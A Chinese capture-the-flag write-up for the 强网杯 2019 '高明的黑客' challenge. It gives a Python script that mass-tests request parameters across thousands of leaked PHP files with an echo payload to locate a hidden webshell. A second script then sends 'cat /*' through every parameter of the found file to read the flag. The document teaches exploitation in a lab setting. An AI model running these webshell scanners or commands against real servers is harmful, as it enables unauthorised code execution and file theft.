[强网杯 2019]高明的黑客

雁过留声，人过留名，此网站已被黑
我也是很佩服你们公司的开发，特地备份了网站源码到www.tar.gz以供大家观赏

根据提供的网站源码我们可以看到有几千个php文件，每个php文件中又有很多$_GET和$_POST数组，估计就是要我们找到webshell了

这个题目考察的就是我们写脚本的能力

import asyncio
import os
import re

import aiohttp

URL = "https://xxxxxxxxx/"
Path = "[强网杯 2019]高明的黑客/src/"

files = os.listdir(Path)
SEM = asyncio.Semaphore(20)


async def get_post(file):
    with open(Path + file) as f:
        content = f.read()
    get = re.findall(r"\$_GET\[[\'\"](.*?)[\'\"]\]", content)
    post = re.findall(r"\$_POST\[[\'\"](.*?)[\'\"]\]", content)
    return get, post


async def check(session, file, params, data):
    async with SEM:
        async with session.post(URL + file, data=data, params=params) as rq:
            text = await rq.text()
            return [file, params, data] if "xxxxxxxx" in text else None


async def solve():
    async with aiohttp.ClientSession() as session:
        tasks = []
        for f in files:
            get, post = await get_post(f)
            param = {}
            data = {}
            for i in get:
                param[i] = "echo 'xxxxxxxx';"
            for j in post:
                data[j] = "echo 'xxxxxxxx';"
            tasks.append(asyncio.create_task(check(session, f, param, data)))
        for t in tasks:
            result = await t
            if result:
                print(result[0], result[1], result[2])


if "__main__" == __name__:
    asyncio.run(solve())

这里我们使用一个echo命令用来判断是否有rce，运行输出

xk0SzyKwfzw.php {'z5c_TrB': "echo 'xxxxxxxx';", 'xd0UXc39w': "echo 'xxxxxxxx';", 'DdWk_nXmZTF_Dt': "echo 'xxxxxxxx';", 'dthxTqRPg8YtH': "echo 'xxxxxxxx';", 'I
mPVuGCXfrS': "echo 'xxxxxxxx';", 'O0yRgyjaOF7m': "echo 'xxxxxxxx';", 'DeMcscsp': "echo 'xxxxxxxx';", 'YV8nqJDhD': "echo 'xxxxxxxx';", 'EMNPxS2A7': "echo 'xxxx
xxxx';", 'kBVLzQEgb': "echo 'xxxxxxxx';", 'Efa5BVG': "echo 'xxxxxxxx';", 'i_QfWB2x1': "echo 'xxxxxxxx';", 'E8NPXbr7Cq': "echo 'xxxxxxxx';", 'zfEddFlxaK_FTO3A'
: "echo 'xxxxxxxx';", 'qjWSY5fjcgNtb': "echo 'xxxxxxxx';", 'qUVRuZTF27EhUKTI': "echo 'xxxxxxxx';"} {'sDCPHvsvwWo': "echo 'xxxxxxxx';", 'V5th2o3Pea_6O': "echo 
'xxxxxxxx';", 'amQ2A0SPU': "echo 'xxxxxxxx';", 'riZH5vvoY': "echo 'xxxxxxxx';", 'ZCBPLk': "echo 'xxxxxxxx';", 'wWMgYch': "echo 'xxxxxxxx';", 'Detx3g1SfCf': "e
cho 'xxxxxxxx';", 'tastJGHA5De': "echo 'xxxxxxxx';", 'fgUPcHJZvkq': "echo 'xxxxxxxx';", 'ppiJIyg': "echo 'xxxxxxxx';", 'KtpWfYB': "echo 'xxxxxxxx';"}

发现这里有很多的参数，这里并不确定是那个，那就把每个都赋值执行的命令，看回显就行了

import re

import requests

URL = "https://e5237c09538dd5b42243d709.http-ctf2.dasctf.com/"

cmd = "cat /*"

Path = "[强网杯 2019]高明的黑客/src/xk0SzyKwfzw.php"


def get_post(file):
    with open(file) as f:
        content = f.read()
    get = re.findall(r"\$_GET\[[\'\"](.*?)[\'\"]\]", content)
    post = re.findall(r"\$_POST\[[\'\"](.*?)[\'\"]\]", content)
    return get, post


get, post = get_post(Path)
param = {}
data = {}
for i in get:
    param[i] = cmd
for j in post:
    data[j] = cmd

print(requests.post(URL + "xk0SzyKwfzw.php", params=param, data=data).text)